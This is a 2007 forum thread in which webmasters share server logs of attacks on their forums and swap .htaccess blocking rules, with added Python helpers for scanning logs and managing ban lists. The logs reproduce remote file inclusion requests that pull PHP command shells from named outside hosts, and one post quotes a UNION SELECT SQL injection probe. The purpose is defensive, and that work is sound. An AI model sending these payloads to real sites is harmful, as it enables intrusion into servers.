
Security Logs with Hacker IP's

PostPosted: Sat May 05, 2007 8:48 am
Author: Omni-Lee
1 01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 02:33 pm /forum/profile.php?mode=http://www.alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 200.138.244.203
5 29 Apr 2007 11:18 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
6 29 Apr 2007 11:45 am /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.226.3
7 29 Apr 2007 11:45 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.18.93.107
8 29 Apr 2007 10:16 am /forum/profile.php?mode=http://www.zjkjw.gov.cn/tool25.txt?&cmd=id 200.181.152.9
9 29 Apr 2007 09:22 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.79.243
10 28 Apr 2007 10:29 pm /forum/profile.php?mode=http://www.Vel0zBR.xpg.com.br/Owner/cmd1.txt?&cmd=id 200.153.54.199
11 27 Apr 2007 06:23 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.2.78.239
12 26 Apr 2007 06:44 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 200.97.25.94
13 25 Apr 2007 11:19 pm /forum/profile.php?mode=http://br.geocities.com/ngrdownz/list.txt?&cmd=id 213.22.52.189
14 25 Apr 2007 11:10 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137
15 25 Apr 2007 07:49 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.8.73.137

Note: Any time I tried to add one of those addresses to the agent blocker it would break the site. CrackerTracker would throw a bunch of code lines at the top of the page.
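Every entry in the list above has the same shape: a forum script is given a query parameter (mode=, module_root_path=, later phpbb_root_path=) whose value is a URL, so the include() the script builds from it fetches a PHP shell from the attacker's host, and the trailing "?&cmd=id" is the shell's own argument. The scanner below is an added example, not code from this thread or from CrackerTracker: it parses entries in the "date time path [agent] IP" layout posted here, flags the ones carrying a remote URL, and tallies the attacking IPs and shell hosts for a block list. The sample log is constructed from three of the entries above plus one benign request on a private address.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# One log entry as posted in the thread: optional running number, date, time,
# request path with query string, optional User-Agent (the libwww-perl hits
# carry one), and the client IP at the end.
LINE_RE = re.compile(
    r"^(?:\d+\s+)?(?P<date>\d{2} \w{3} \d{4}) (?P<time>\d{2}:\d{2} [ap]m)\s+"
    r"(?P<path>\S+)(?:\s+(?P<agent>\S+/[\d.]+))?\s+(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$"
)

# A query parameter whose value is an absolute URL. The forum builds an
# include() path from parameters such as mode=, phpbb_root_path= and
# module_root_path=; with allow_url_fopen on, PHP fetches the file from the
# attacker's host and runs it. The trailing '?' on the URL turns whatever the
# script appends into a query string, and '&cmd=id' is the shell's own argument.
RFI_RE = re.compile(r"[?&](?P<param>[A-Za-z_][\w\[\]]*)=(?P<url>https?://[^&\s]+)", re.I)
CMD_RE = re.compile(r"[?&]cmd=(?P<cmd>[^&\s]*)", re.I)

# Constructed sample: three entries copied from the post above plus one benign
# profile view from a private address, so the scanner has something to ignore.
SAMPLE_LOG = """\
1 01 May 2007 03:59 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 83.144.149.196
2 01 May 2007 03:35 pm /forum/kb.php?mode=cat&cat=31//includes/kb_constants.php?module_root_path=http://www.abschleppdienst-viersen.de/templates/mp_ferro/images/freeman.txt? libwww-perl/5.803 81.169.149.189
3 30 Apr 2007 09:43 pm /forum/profile.php?mode=http://www.narkote.net/tool25.txt?&cmd=id 201.29.250.108
4 30 Apr 2007 09:40 pm /forum/profile.php?mode=viewprofile&u=12 10.0.0.5
"""


def parse_line(line):
    """Split one entry into its fields; None if the line is not an entry."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Attach RFI indicators to a parsed entry, or return None for a benign request."""
    m = RFI_RE.search(entry["path"])
    if not m:
        return None
    cmd = CMD_RE.search(entry["path"])
    return {
        "date": entry["date"],
        "ip": entry["ip"],
        "agent": entry["agent"],
        "script": urlsplit(entry["path"]).path,        # the local script being abused
        "param": m.group("param"),                     # the parameter that reached include()
        "shell_url": m.group("url"),                   # where the shell is hosted
        "shell_host": urlsplit(m.group("url")).hostname,
        "cmd": cmd.group("cmd") if cmd else None,      # command the shell was asked to run
    }


def scan(log_text):
    """Return every RFI hit found in the log text, in file order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and (hit := classify(entry)):
            hits.append(hit)
    return hits


def summarize(hits):
    """Tally attacking IPs, shell hosts and abused parameters for a block list."""
    return {
        "ips": Counter(h["ip"] for h in hits),
        "shell_hosts": Counter(h["shell_host"] for h in hits),
        "params": Counter(h["param"] for h in hits),
    }


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(f'{h["date"]} {h["ip"]:<16} {h["script"]} {h["param"]}= -> '
              f'{h["shell_host"]} cmd={h["cmd"]} agent={h["agent"]}')
    print(summarize(found))
```

The shell host is worth tallying separately from the client IP: the clients rotate through proxies, but the same few hosts (alls.net, narkote.net) serve the tool for weeks, and a hit on one of them is a reliable signature even when the IP is new.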

Re: Security Logs with Hacker IP's

PostPosted: Thu May 10, 2007 5:30 pm
Author: Omni-Lee
Thought I'd add a few more.

1 08 May 2007 07:16 pm /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.67.182.247
2 08 May 2007 05:11 pm /forum/profile.php?mode=http://www.freewebs.com/dropcmd/tool25.dat?&cmd=id 189.13.156.90
3 08 May 2007 11:20 am /forum/profile.php?mode=http://dropcmd.netfast.org/tool25.txt?&cmd=id 201.9.15.12
4 08 May 2007 01:17 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 189.13.114.100
5 07 May 2007 11:54 am /forum/profile.php?mode=http://alls.net/unfz/t00lz/cmdtool25/tool25.dat?&cmd=id 201.9.96.227
6 06 May 2007 09:21 pm /forum/profile.php?mode=http://www.tools25.kit.net/tool25.dat?&cmd=id 201.8.90.148

Re: Security Logs with Hacker IP's

PostPosted: Tue Jul 03, 2007 10:10 pm
Author: CaNNon
Have you run into this tool yet?

http://securityjobs.us/xpl/tembak.txt?

I think this one gets through but I'm not 100% sure.
I have 4 hits from it and the forum goes down to a .script kiddie pr message.

Re: Security Logs with Hacker IP's

PostPosted: Fri Jul 13, 2007 1:03 pm
Author: jomasaco
Good initiative Omni-Lee. I leave here my contribution.

201.50.228.87
04 Jul 2007 01:11 am /forum/IM141/profile.php?mode=http://www.butterbeidefische.de/DB59528/tool25.txt?&cmd=id
libwww-perl/5.69 217.110.144.106
13 Jul 2007 06:02 am /forum/postings_popup.php?t=69//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?
/forum/viewtopic.php?printertopic=1&t=9&start=0&postdays=0&postorder=asc&vote=viewresult//includes/functions.php?phpbb_root_path=http://medrogo.interfree.it/d.txt?

PostPosted: Sat Jul 14, 2007 12:20 am
Author: viragotech
I have been getting slammed with lots of similar stuff daily from about 10 different domains. Each day it's a whole new block of domains. But thank god none of them have worked, as they get caught and dumped as 403 errors.

Once I noticed, I did spend the first few days reporting sites and getting them shut down, but once I realized they change domains daily it doesn't make any sense and it's mucho work.

Though I have been editing my .htaccess to block any traffic from said URLs ever again, for when they start the rotation of domains over at some point.

Re: Security Logs with Hacker IP's

PostPosted: Sun Jul 15, 2007 10:53 am
Author: CaNNon
Though I have been editing my .htaccess to block any traffic from said URLs ever again, for when they start the rotation of domains over at some point.


I'm using the IPs, not the URLs. I know the IPs are proxies, but I figure I've a better chance to block. (Although that .script didn't work, the proxy did... so if I block the proxy I may well stop a run with a .script that does work.)

As soon as I get an attempt I add the IP to the .htaccess; this creates an update to my proxy ban list. Also I have started adding " # date " (rem statements), so once the proxy is dead it can be removed from the list and help keep the .htaccess file size down, as I think the file gets processed on every hit.
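A dated ban list only pays off if the dates are actually used to prune it, and Apache processes .htaccess on every request, so the file should not grow without bound. The helper below is an added example, not CaNNon's script: it adds a ban with a date stamp, refuses duplicates, and drops entries older than a cutoff while leaving every other directive untouched. One caveat it builds in: Apache only accepts comments on their own line, so the date goes on the line before the Deny rather than after it on the same line. The .htaccess text is constructed for the example, using the Apache 2.2 Order/Allow/Deny syntax a 2007 host would run and two IPs from the list above.

```python
import re
from datetime import date

# Apache only accepts comments on their own line, so the date stamp sits on
# the line before each Deny (assumed layout, not necessarily CaNNon's).
BAN_COMMENT_RE = re.compile(r"^#\s*banned\s+(?P<date>\d{4}-\d{2}-\d{2})\s*$")
DENY_RE = re.compile(r"^Deny from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*$")

# Constructed .htaccess: a libwww-perl rewrite block plus two dated bans
# taken from the IPs Omni-Lee listed.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} libwww-perl
RewriteRule ^.* - [F,L]

Order allow,deny
Allow from all
# banned 2007-04-29
Deny from 201.29.226.3
# banned 2007-04-25
Deny from 201.8.73.137
"""


def parse_bans(text):
    """Yield (comment_line_index, ip, ban_date) for every dated ban pair."""
    lines = text.splitlines()
    for i in range(len(lines) - 1):
        c = BAN_COMMENT_RE.match(lines[i])
        d = DENY_RE.match(lines[i + 1])
        if c and d:
            yield i, d.group("ip"), date.fromisoformat(c.group("date"))


def banned_ips(text):
    """The set of IPs currently carrying a dated ban."""
    return {ip for _, ip, _ in parse_bans(text)}


def add_ban(text, ip, today):
    """Append a dated ban for ip (today as 'YYYY-MM-DD'); never adds a duplicate."""
    date.fromisoformat(today)              # reject a malformed date up front
    if ip in banned_ips(text):
        return text
    if text and not text.endswith("\n"):
        text += "\n"
    return f"{text}# banned {today}\nDeny from {ip}\n"


def prune(text, today, max_age_days):
    """Drop ban pairs older than max_age_days; every other line is kept as is."""
    cutoff = date.fromisoformat(today)
    drop = set()
    for i, _ip, when in parse_bans(text):
        if (cutoff - when).days > max_age_days:
            drop.update((i, i + 1))        # comment line and its Deny line
    kept = [line for i, line in enumerate(text.splitlines()) if i not in drop]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    current = add_ban(SAMPLE_HTACCESS, "61.19.188.2", "2007-07-15")
    print(current)
    print("after pruning bans older than 60 days:")
    print(prune(current, "2007-07-15", 60))
```

The prune step is deliberately conservative: only a comment/Deny pair in exactly this format is ever removed, so hand-written Deny lines without a date stamp, and everything else in the file, survive untouched.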

Re: Security Logs with Hacker IP's

PostPosted: Sun Jul 15, 2007 4:52 pm
Author: jomasaco
one more.
/forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

Re: Security Logs with Hacker IP's

PostPosted: Fri Jul 20, 2007 7:45 am
Author: Whisky
I've got serious attacks (hopefully blocked) several times a day on my portal!


62.60.137.49
Fri 20 Jul 2007, 5


This proves that people complaining here about the insecurity of IM or the inutility of CrackerTracker are just idiots, in my opinion.

Re: Security Logs with Hacker IP's

PostPosted: Fri Jul 20, 2007 1:04 pm
Author: CaNNon
Yeah, my logs look like that too. For all the trouble setting up CT, I've got to say it was worth it.

Re: Security Logs with Hacker IP's

PostPosted: Mon Jul 23, 2007 5:08 pm
Author: jomasaco
Still was not for this but should be barely... :P :P

These brutes do not have a life, do not eat, do not drink, do not sleep. I have there xxx but I find that also do not want.

PostPosted: Wed Jul 25, 2007 1:21 pm
Author: viragotech
Yep, I had to change domains and get a new host from all of that. I changed domains so they wouldn't just follow me to my new host, and had to get a new host because with so many hack attempts I was over my traffic limits for CGI.

Buddy just lost 3 of his 141 IM forums today. They deleted everything. He doesn't know how they got root access, but all is gone.

Re: Security Logs with Hacker IP's

PostPosted: Wed Jul 25, 2007 8:18 pm
Author: CaNNon
Although I don't like doing this I have added this to my htaccess file. It's really cut back the number of runs on my forum.

jomasaco, I think you need to add it for sure!

RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]


So you need it to look like this in the htaccess file.

Code: Select all
 RewriteEngine On
 # testing user agent blocking
 RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
 # end test
 RewriteRule ^.* - [F,L]


If RewriteEngine is already on, just add the first line in the quote; if not, add the whole code to the file so it will process it.

Re: Security Logs with Hacker IP's

PostPosted: Thu Jul 26, 2007 5:25 am
Author: Whisky
Code: Select all
 RewriteEngine On
 # testing user agent blocking
 RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
 # end test
 RewriteRule ^.* - [F,L]



Definitely interesting, thank you.

Re: Security Logs with Hacker IP's

PostPosted: Fri Jul 27, 2007 9:16 pm
Author: CaNNon
NP Whisky, day 4 since I added that myself. On a side note, it's been nice and quiet.

PostPosted: Fri Aug 17, 2007 1:47 pm
Author: Pflegen
When my IM site got hit a while back, I ended up blocking URLs with "/includes" or "/function*" in them.

Note: I also turned off allow_url_fopen in the php.ini.

.htaccess or httpd.conf
===============

<Files>
Order allow,deny
Deny from all
</Files>

<Files>
Order allow,deny
Deny from all
</Files>



We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...

[Fri Aug 17 15:06:54 2007] [error] [client 203.32.125.78] client denied by server configuration: /websites/HG/html/includes/functions_portal.php


I like the URL rewrite as well, though. May consider that as a follow-up to catch the others that aren't using the include or function* paths.

Re: Security Logs with Hacker IP's

PostPosted: Sat Aug 18, 2007 7:25 pm
Author: CaNNon
We still get lots of attacks, but it generates a nice log in the error_log for tracking/reporting purposes...


Using rewrite, it kills the tool that is hitting me in about 85% of the attacks. This makes the log smaller, so if you try it, set it up to process the rewrite first, then the URLs. It could help speed things up a bit (this file is processed on every request, I believe) and make a little less work with the logs for you.

Just a thought.

Re: Security Logs with Hacker IP's

PostPosted: Wed Nov 28, 2007 9:46 pm
Author: Omni-Lee
Checking the log file I found this little number:

Code: Select all
/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D34,0x2D4578372D35,0x2D4578372D36,0x2D4578372D37,0x2D4578372D38,0x2D4578372D39,0x2D4578372D3130,0x2D4578372D3131,0x2D4578372D3132,0x2D4578372D3133,0x2D4578372D3134,0x2D4578372D3135,0x2D4578372D3136,0x2D4578372D3137,0x2D4578372D3138,0x2D4578372D3139,0x2D4578372D3230,0x2D4578372D3231,0x2D4578372D3232,0x2D4578372D3233,0x2D4578372D3234,0x2D4578372D3235,0x2D4578372D3236,0x2D4578372D3237,0x2D4578372D3238,0x2D4578372D3239,0x2D4578372D3330,0x2D4578372D3331,0x2D4578372D3332,0x2D4578372D3333,0x2D4578372D3334,0x2D4578372D3335,0x2D4578372D3336,0x2D4578372D3337,0x2D4578372D3338,0x2D4578372D3339,0x2D4578372D3430,0x2D4578372D3431,0x2D4578372D3432,0x2D4578372D3433,0x2D4578372D3434,0x2D4578372D3435,0x2D4578372D3436,0x2D4578372D3437,0x2D4578372D3438,0x2D4578372D3439,0x2D4578372D3530/*


What the heck is it?

Btw, what is that Rewrite in .htaccess? Can it be used for attacks like what I posted above?
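The long 0x... values in that request are MySQL hex string literals, and they decode to numbered markers ("-Ex7-1" through "-Ex7-50"): one literal per column of the injected SELECT, so whichever column the page echoes back tells the attacker its position, without a single quote character that addslashes() or magic_quotes would have escaped. The decoder below is an added example, not the forum's or CrackerTracker's code; the request it analyzes is the one posted above, cut down to five of its fifty literals so it fits here, with nothing else changed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# The request from the post above, cut down to five of its fifty 0x... values
# (the original line is too long to repeat here; nothing else is changed).
PROBE = ("/forum/links.php?t=search&search_keywords=asd&start=1,1+and+1=2+union+select+"
         "0x2D4578372D31,0x2D4578372D32,0x2D4578372D33,0x2D4578372D3130,0x2D4578372D3530/*")

HEX_LITERAL = re.compile(r"\b0x([0-9A-Fa-f]+)\b")
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?\bselect\b", re.I)


def decode_hex_literals(sql):
    """Turn MySQL 0x... string literals back into text.

    Attackers write strings this way so the payload contains no quotes, which
    addslashes()/magic_quotes would have escaped. Odd-length hex is a number,
    not a string, and is skipped."""
    out = []
    for h in HEX_LITERAL.findall(sql):
        if len(h) % 2 == 0:
            out.append(bytes.fromhex(h).decode("ascii", errors="backslashreplace"))
    return out


def analyze(request_path):
    """Describe a UNION SELECT probe found in any query parameter, or None."""
    params = parse_qs(urlsplit(request_path).query, keep_blank_values=True)
    for name, values in params.items():
        for value in values:            # parse_qs has already turned '+' into spaces
            if not UNION_SELECT.search(value):
                continue
            markers = decode_hex_literals(value)
            return {
                "param": name,
                "columns": len(markers),           # one literal per SELECT column
                "markers": markers,                # numbered, so the echoed one reveals its position
                # '1=2' blanks the real rows so only the injected row shows
                "forces_empty": re.search(r"\b1\s*=\s*2\b", value) is not None,
                # '/*' comments out whatever the script appends to the query
                "comment_tail": value.rstrip().endswith("/*"),
            }
    return None


if __name__ == "__main__":
    print(analyze(PROBE))
```

As for the rewrite question: the mod_rewrite counterpart is a condition on the query string rather than the User-Agent, for example `RewriteCond %{QUERY_STRING} union[^a-z]+select [NC]` in front of the same `RewriteRule ^.* - [F,L]`; `[^a-z]+` covers the `+`, a literal space or `%20` between the two keywords, whichever form the request arrives in.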

Re: Security Logs with Hacker IP's

PostPosted: Thu Nov 29, 2007 8:07 am
Author: CaNNon
Post the full attack like this:

forum/viewforum.php?f=4&mark=topics&lofi=1//includes/functions_portal.php?phpbb_root_path=http://terroristirc.by.ru/rootlab.jpg?
libwww-perl/5.79 61.19.188.2 15 Jul 2007 11:04 pm

and if I have a .htaccess rule I'll post it. The attack type is in that URL: "union+select".

Re: Security Logs with Hacker IP's

PostPosted: Thu Nov 29, 2007 11:29 am
Author: Omni-Lee
I tried the RewriteCond code you supplied and I get 403 Access Denied. It was a direct copy and paste.

*Edit*: I found the problem: the [OR] can only be used when there is going to be another command (possibly of a similar type).

Code: Select all
 RewriteEngine On
 # testing user agent blocking
 RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
 RewriteCond %{HTTP_USER_AGENT} ai_archiver
 # end test
 RewriteRule ^.* - [F,L]
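The 403-for-everyone behaviour Omni-Lee hit has a simple mechanism: [OR] tells mod_rewrite that a failed condition should just move on to the next one, and when there is no next one the walk runs off the end of the chain, which counts as the chain having passed, so the RewriteRule fires on every request. The checker below is an added example, not anything from this thread or from Apache: it parses RewriteCond/RewriteRule lines, flags a chain whose last condition carries [OR], and evaluates a request against a small model of the condition walk (modelled from the behaviour reported above, not taken from Apache's source). The two configurations are CaNNon's block and Omni-Lee's corrected one; `ia_archiver`, the Internet Archive crawler's User-Agent, stands in for the spelling in the post above as an assumption.

```python
import re

COND_RE = re.compile(
    r"^\s*RewriteCond\s+(?P<var>%\{\w+\})\s+(?P<pat>\S+)(?:\s+\[(?P<flags>[^\]]*)\])?\s*$", re.I)
RULE_RE = re.compile(
    r"^\s*RewriteRule\s+(?P<pat>\S+)\s+(?P<sub>\S+)(?:\s+\[(?P<flags>[^\]]*)\])?\s*$", re.I)

# The block with the trailing [OR] (as first posted) and the corrected one.
# 'ia_archiver' is the Internet Archive crawler's User-Agent, assumed here
# in place of the spelling used in the post above.
BROKEN = """\
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteRule ^.* - [F,L]
"""
FIXED = """\
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
RewriteCond %{HTTP_USER_AGENT} ia_archiver
RewriteRule ^.* - [F,L]
"""


def _flags(s):
    return {f.strip().upper() for f in (s or "").split(",") if f.strip()}


def parse_rules(config):
    """Group each RewriteRule with the RewriteCond lines directly above it."""
    rules, conds = [], []
    for line in config.splitlines():
        if (m := COND_RE.match(line)):
            fl = _flags(m.group("flags"))
            conds.append({"var": m.group("var"), "pat": m.group("pat"),
                          "or": bool(fl & {"OR", "ORNEXT"}), "nc": bool(fl & {"NC", "NOCASE"})})
        elif (m := RULE_RE.match(line)):
            rules.append({"conds": conds, "pat": m.group("pat"), "flags": _flags(m.group("flags"))})
            conds = []
    return rules


def lint(config):
    """Flag a condition chain that ends with [OR]: there is nothing to OR it with."""
    return [f"rule {n}: last RewriteCond carries [OR] with no following condition; "
            f"the chain passes for every request"
            for n, rule in enumerate(parse_rules(config), 1)
            if rule["conds"] and rule["conds"][-1]["or"]]


def conds_pass(conds, env):
    """Model of the condition walk: a failed [OR] condition moves on to the next,
    a passed one skips the rest of its OR group (including the plain condition
    that closes the group), a failed plain condition fails the rule, and running
    off the end of the chain counts as passed."""
    i = 0
    while i < len(conds):
        c = conds[i]
        ok = re.search(c["pat"], env.get(c["var"], ""), re.I if c["nc"] else 0) is not None
        if c["or"]:
            if ok:
                while i < len(conds) and conds[i]["or"]:
                    i += 1               # skip the remaining ORed conditions ...
            i += 1                       # ... and the closing one, or just advance on failure
            continue
        if not ok:
            return False
        i += 1
    return True


def blocked(config, user_agent, path="/forum/index.php"):
    """True if a forbidding ([F]) rule fires for this request under the model."""
    env = {"%{HTTP_USER_AGENT}": user_agent, "%{REQUEST_URI}": path}
    return any(rule["flags"] & {"F", "FORBIDDEN"}
               and re.search(rule["pat"], path)
               and conds_pass(rule["conds"], env)
               for rule in parse_rules(config))


if __name__ == "__main__":
    for name, cfg in (("broken", BROKEN), ("fixed", FIXED)):
        print(name, lint(cfg),
              "browser blocked:", blocked(cfg, "Mozilla/5.0"),
              "libwww-perl blocked:", blocked(cfg, "libwww-perl/5.79"))
```

The fix of adding a second condition works because the plain (non-OR) condition closes the group; the same effect is had by simply dropping [OR] from a lone condition, which is what the single-condition form of the block needs.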

Re: Security Logs with Hacker IP's

PostPosted: Thu Nov 29, 2007 12:53 pm
Author: CaNNon
That's correct. Did you check to see if that block will stop that?

Re: Security Logs with Hacker IP's

PostPosted: Thu Nov 29, 2007 3:35 pm
Author: Omni-Lee
I've been watching and the logs have been clean. What's totally nuts is I actually want to see an entry now, just so I can block it. Thanks for that bit of code. With the error, inadvertent as it was, I researched .htaccess commands and found ways to further secure my site, specifically hiding the .htaccess file from external requests. I never knew all the good things that could be done in .htaccess; it is a pretty powerful file.